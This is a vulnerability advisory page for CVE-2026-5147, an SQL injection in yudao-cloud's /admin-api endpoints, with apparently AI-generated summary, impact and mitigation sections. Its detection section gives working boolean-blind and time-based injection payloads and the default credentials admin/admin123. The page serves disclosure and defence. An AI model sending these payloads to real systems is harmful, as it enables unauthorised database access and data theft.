CVE-2026-5147
Received Received - Intake
SQL Injection in YunaiV yudao-cloud /admin-api Remote Exploit

Publication date: 2026-03-30

Last updated on: 2026-04-29

Assigner: VulDB

Description
A security flaw has been discovered in YunaiV yudao-cloud up to 2026.01. This affects an unknown part of the file /admin-api/system/tenant/get-by-website. The manipulation of the argument Website results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-30
Last Modified
2026-04-29
Generated
2026-06-16
AI Q&A
2026-03-30
EPSS Evaluated
2026-06-14
NVD
CVE-2026-5147
EUVD
EUVD-2026-17168
Affected Vendors & Products
Currently, no data is known.
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-89 The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-5147 is a security vulnerability in the yudao-cloud project version v2026.01 involving SQL injection attacks. Specifically, it affects the /admin-api/system/tenant/get-by-website endpoint, where an attacker can manipulate the 'website' parameter to perform a SQL Boolean Blind Injection without needing to authenticate.

This means an attacker can send specially crafted requests that alter the SQL queries executed by the backend database, potentially allowing them to extract sensitive information or manipulate the database.

Additionally, there is a related SQL Blind Injection vulnerability in the /admin-api/system/mail-log/page endpoint, which requires authentication but can be exploited due to weak default credentials (admin/admin123). This allows time-based blind SQL injection attacks to extract data by measuring response delays.

Impact Analysis

This vulnerability can have serious impacts including unauthorized access to sensitive database information, data leakage, and potential compromise of the backend database.

Because the injection can be performed remotely and without authentication on one endpoint, attackers can exploit it easily to gather information or manipulate data.

The presence of weak default credentials on another endpoint further increases the risk, allowing attackers to perform time-based blind SQL injection attacks to extract data.

Overall, exploitation could lead to data breaches, loss of data integrity, and disruption of service.

Detection Guidance

The vulnerability can be detected by testing the affected endpoints for SQL injection using crafted requests that manipulate the 'website' parameter or other vulnerable parameters.

  • For the unauthenticated SQL Boolean Blind Injection in `/admin-api/system/tenant/get-by-website`, you can send a request like: `/admin-api/system/tenant/get-by-website?website=8.138.89.15:8888'%27AND(IF(06339=6338,1,(select table_name from information_schema.tables)))AND'%27Z` and observe the response behavior.
  • Use sqlmap, a popular SQL injection tool, to automate detection of the injection vulnerability on this endpoint.
  • For the authenticated SQL Blind Injection in `/admin-api/system/mail-log/page`, after logging in with default credentials (`admin/admin123`), send a request like: `GET /admin-api/system/mail-log/page?pageNo=1&pageSize=10&toMail='and(select*from(select+sleep(10))a/**/union/**/select+1)=' HTTP/1.1` and measure if the response is delayed by 10 seconds, indicating a time-based blind SQL injection.
Mitigation Strategies

Immediate mitigation steps include restricting access to the vulnerable endpoints, especially the unauthenticated ones, and changing or disabling weak default credentials such as 'admin/admin123' to prevent authenticated exploitation.

Additionally, monitor and block suspicious requests that attempt SQL injection payloads targeting the affected APIs.

Applying input validation and parameterized queries in the application code to prevent SQL injection is critical, though this may require vendor patches or code updates.

Compliance Impact

The CVE-2026-5147 vulnerability allows attackers to perform SQL injection attacks on the yudao-cloud system, potentially leading to unauthorized access to sensitive data stored in the backend database.

Such unauthorized data access and potential data breaches can result in non-compliance with data protection regulations like GDPR and HIPAA, which require the protection of personal and sensitive information against unauthorized access and disclosure.

Therefore, exploitation of this vulnerability could lead to violations of these standards due to compromised confidentiality, integrity, and availability of protected data.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-5147. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart